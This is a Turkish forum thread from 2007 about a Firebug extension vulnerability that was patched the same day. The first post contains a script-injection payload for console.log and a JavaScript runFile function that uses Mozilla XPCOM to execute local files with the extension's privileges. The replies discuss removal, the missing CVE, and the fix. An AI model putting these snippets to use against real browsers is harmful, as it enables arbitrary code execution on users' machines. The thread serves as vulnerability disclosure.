folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Firebug"Da Büyük Açık Ke$Fedildi :| [4Nisan]



Firebug"Da Büyük Açık Ke$Fedildi :| [4Nisan]

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Kayıt Tarihi: 10/Mayıs/2003
    Erkek

    cnaımız ciğerimiz firefox'un can yoldaşı javascript yazarlarının biricik sevgilisi firebug firefox'un file objesine direkt erişime sahip olduğundna hertürlü ipneliği çalıştırma yetkisine olanak veriyo.
    Console.log komutuyla normalde konsola debug ederiz bişeyler ama şu şekilde log edince;

    console.log({'<script>alert("tahribat.kon")</script>':'exploit'})

    script çalışıyo hemde en kötüsü firefoxun web sitesine verdiği yetki değil firefoxun eklentiye verdiği yetki üzerindne çalışıyo.. nelermi yapılaiblir? herşey! örneğin geçenlerde çıkan şu file execute olayı hemen çözülmüştü ama firebug bunu halen çalıştıracak yetkiye sahip... firefox için runfile komutu;

    function runFile(f) {
            var file = Components.classes["@mozilla.org/file/local;1"]
                    .createInstance(Components.interfaces.nsILocalFile);

            file.initWithPath(f);

            var process = Components.classes["@mozilla.org/process/util;1"]
                    .createInstance(Components.interfaces.nsIProcess);

            process.init(file);

            var argv = Array.prototype.slice.call(arguments, 1);

            process.run(true, argv, argv.length);
    }

    ne yapmalı? çözümü bulunana kadar firebug kullanmamalı.
    daha fazla ayrıntı; http://www.gnucitizen.org/blog/firebug-goes-evil

    Reply With Quote Alıntı yap
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RaAmLis
    RaAmLis's avatar
    Kayıt Tarihi: 23/Eylül/2005
    Erkek
    nasıl kaldırılıo bu firebug?
    Hayattaki amacını bulamayan, bulmaya yaklaştığını hissettiğinde ise alıkoyulan bu yüzden herşeyi oluruna bırakan ama bunu da beceremeyen kişi.
    Reply With Quote Alıntı yap
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    amele_2
    amele_2's avatar
    Kayıt Tarihi: 01/Eylül/2005
    Erkek

    yazdığın kodları benim gibi programlama bilmeyen dallamalar için bi açıklayabilirmisin?function runFile(f) {
            var file = Components.classes["@mozilla.org/file/local;1"]
                    .createInstance(Components.interfaces.nsILocalFile);

    ne diyo bu amk :S 

    Ardından yüz köpek havlamayan kurt, kurt sayılmaz..
    Reply With Quote Alıntı yap
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Kayıt Tarihi: 10/Mayıs/2003
    Erkek
    firebug bi eklentidir bütün firefox sürümlerinde olan bişey dğeil yani. ama js programcılaırnın, xhtml kodlayanların çoğu kullanır. www.getfirebug.com adresindne çekilir kaldırmak içinde eklentilerden kaldırı seçicen sadece.
    Reply With Quote Alıntı yap
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RaAmLis
    RaAmLis's avatar
    Kayıt Tarihi: 23/Eylül/2005
    Erkek
    gecen burdan birisi linkini vermisti indirmistim ne şanssız adamım daha yararlanamadan acık cıktı
    Hayattaki amacını bulamayan, bulmaya yaklaştığını hissettiğinde ise alıkoyulan bu yüzden herşeyi oluruna bırakan ama bunu da beceremeyen kişi.
    Reply With Quote Alıntı yap
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek

    CVE Referansı yok mu? Planet Security[1]'e haber düşmedi..

    http://planetsecurity.bacarospo.net/

    Açığın doğrulandığına dair herhangi bir haber yok, beklemeyi ve kullanmamayı tercih ediyorum :) 

    Reply With Quote Alıntı yap
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek

    Her neyse, açık kapatıldı;

     

    About an hour ago I received word of a 0-day security exploit that has been discovered and reported. I have just released a new Firebug (version 1.03) with a fix for this bug, and I recommend that everyone install it as soon as possible.

     

    http://www.getfirebug.com/blog/2007/04/04/security-update/ 

    Reply With Quote Alıntı yap
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    amele_2
    amele_2's avatar
    Kayıt Tarihi: 01/Eylül/2005
    Erkek

    çıktığı gün kapandı ha : )

    gözünü sevdiğimin opın sörcü 

    Ardından yüz köpek havlamayan kurt, kurt sayılmaz..
    Reply With Quote Alıntı yap
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    İnce Memed
    ComputerWolf
    ComputerWolf's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 26/Mart/2003
    Erkek
    Onemli olan ciktigi gun kapatilmasi degilki :) acik duyuruldugu andan itibaren bitmis demektir.Kim bilir ne canlar yandi bu aciktan :)
    Hep denedin. Hep yenildin. Olsun yine dene , yine yenil ama daha iyi yenil !
    Reply With Quote Alıntı yap
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    VisualBoy
    VisualBoy's avatar
    Kayıt Tarihi: 29/Mayıs/2004
    Erkek
    firefox operanın züküne kurban olsun. en temizi opera
    HolyOne'a ulasinca, bildirecegim...
    Reply With Quote Alıntı yap
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek

    ComputerWolf bunu yazdı:
    -----------------------------
    Onemli olan ciktigi gun kapatilmasi degilki :) acik duyuruldugu andan itibaren bitmis demektir.Kim bilir ne canlar yandi bu aciktan :)
    -----------------------------

     

    Evet, microsoft ie'deki açıklarını en erken 4 ayda kapatıyor. Kim bilir ne canlar yanmıştır :) 

    Reply With Quote Alıntı yap
Toplam Hit: 14840 Toplam Mesaj: 12